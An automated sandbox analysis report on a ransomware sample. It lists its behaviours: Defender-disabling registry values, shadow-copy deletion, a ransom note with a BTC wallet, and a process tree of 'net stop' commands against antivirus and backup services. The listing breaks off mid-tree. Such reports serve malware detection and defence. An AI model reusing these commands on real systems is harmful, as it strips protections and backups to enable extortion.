c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

Analysis

max time kernel
143s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
21-06-2024 11:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Size

87KB
MD5

d6d956267a268c9dcf48445629d2803e
SHA1

cc0feae505dad9c140dd21d1b40b518d8e61b3a4
SHA256

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
SHA512

e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
SSDEEP

1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Score

10^/10

defense_evasion evasion execution impact persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/4416-1-0x0000000000140000-0x000000000015C000-memory.dmp	disable_win_def

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (54) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 2 IoCs

flow	pid	Process
37	6288	mshta.exe
39	6288	mshta.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Executes dropped EXE 1 IoCs

pid	Process
6932	0zwwleoe.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4640	sc.exe
3744	sc.exe
2864	sc.exe
2816	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4548	vssadmin.exe
884	vssadmin.exe
3244	vssadmin.exe
5072	vssadmin.exe
2940	vssadmin.exe
4200	vssadmin.exe
3792	vssadmin.exe
4860	vssadmin.exe
3080	vssadmin.exe
5040	vssadmin.exe
4828	vssadmin.exe
2264	vssadmin.exe
1968	vssadmin.exe
1996	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3252	taskkill.exe
2320	taskkill.exe
3348	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5856	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeAssignPrimaryTokenPrivilege	6932	0zwwleoe.exe
Token: SeIncreaseQuotaPrivilege	6932	0zwwleoe.exe
Token: SeImpersonatePrivilege	6932	0zwwleoe.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4416 wrote to memory of 2992	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	91
PID 4416 wrote to memory of 2992	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	91
PID 4416 wrote to memory of 2892	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	93
PID 4416 wrote to memory of 2892	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	93
PID 4416 wrote to memory of 2292	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	94
PID 4416 wrote to memory of 2292	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	94
PID 4416 wrote to memory of 3920	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 4416 wrote to memory of 3920	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 4416 wrote to memory of 3992	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	96
PID 4416 wrote to memory of 3992	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	96
PID 4416 wrote to memory of 4396	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	98
PID 4416 wrote to memory of 4396	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	98
PID 4416 wrote to memory of 8	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	99
PID 4416 wrote to memory of 8	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	99
PID 4416 wrote to memory of 3916	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	101
PID 4416 wrote to memory of 3916	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	101
PID 4416 wrote to memory of 1568	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	102
PID 4416 wrote to memory of 1568	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	102
PID 4416 wrote to memory of 2012	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	103
PID 4416 wrote to memory of 2012	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	103
PID 4416 wrote to memory of 1112	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	104
PID 4416 wrote to memory of 1112	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	104
PID 4416 wrote to memory of 892	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	106
PID 4416 wrote to memory of 892	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	106
PID 4416 wrote to memory of 2268	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	107
PID 4416 wrote to memory of 2268	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	107
PID 4416 wrote to memory of 2224	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	108
PID 4416 wrote to memory of 2224	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	108
PID 4416 wrote to memory of 2072	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	109
PID 4416 wrote to memory of 2072	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	109
PID 4416 wrote to memory of 3508	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	110
PID 4416 wrote to memory of 3508	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	110
PID 4416 wrote to memory of 1792	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	112
PID 4416 wrote to memory of 1792	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	112
PID 4416 wrote to memory of 1068	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	113
PID 4416 wrote to memory of 1068	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	113
PID 4416 wrote to memory of 3596	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	114
PID 4416 wrote to memory of 3596	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	114
PID 4416 wrote to memory of 1636	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	115
PID 4416 wrote to memory of 1636	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	115
PID 4416 wrote to memory of 380	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	117
PID 4416 wrote to memory of 380	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	117
PID 4416 wrote to memory of 4592	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	118
PID 4416 wrote to memory of 4592	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	118
PID 4416 wrote to memory of 4076	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	119
PID 4416 wrote to memory of 4076	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	119
PID 4416 wrote to memory of 2424	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	120
PID 4416 wrote to memory of 2424	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	120
PID 4416 wrote to memory of 2248	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	121
PID 4416 wrote to memory of 2248	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	121
PID 4416 wrote to memory of 2672	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	122
PID 4416 wrote to memory of 2672	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	122
PID 4416 wrote to memory of 1804	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	123
PID 4416 wrote to memory of 1804	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	123
PID 4416 wrote to memory of 3024	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	124
PID 4416 wrote to memory of 3024	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	124
PID 4416 wrote to memory of 4304	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	125
PID 4416 wrote to memory of 4304	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	125
PID 4416 wrote to memory of 3888	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	126
PID 4416 wrote to memory of 3888	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	126
PID 4416 wrote to memory of 4268	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	127
PID 4416 wrote to memory of 4268	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	127
PID 4416 wrote to memory of 2252	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	129
PID 4416 wrote to memory of 2252	4416	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	129

C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
"C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:6044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:6060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:3992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:6280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:6080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:8
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:3916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:3980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:1568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:1372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:4984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:1112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:6196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:1392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:3508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:2172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:1636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:1832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:5488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:2424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1804
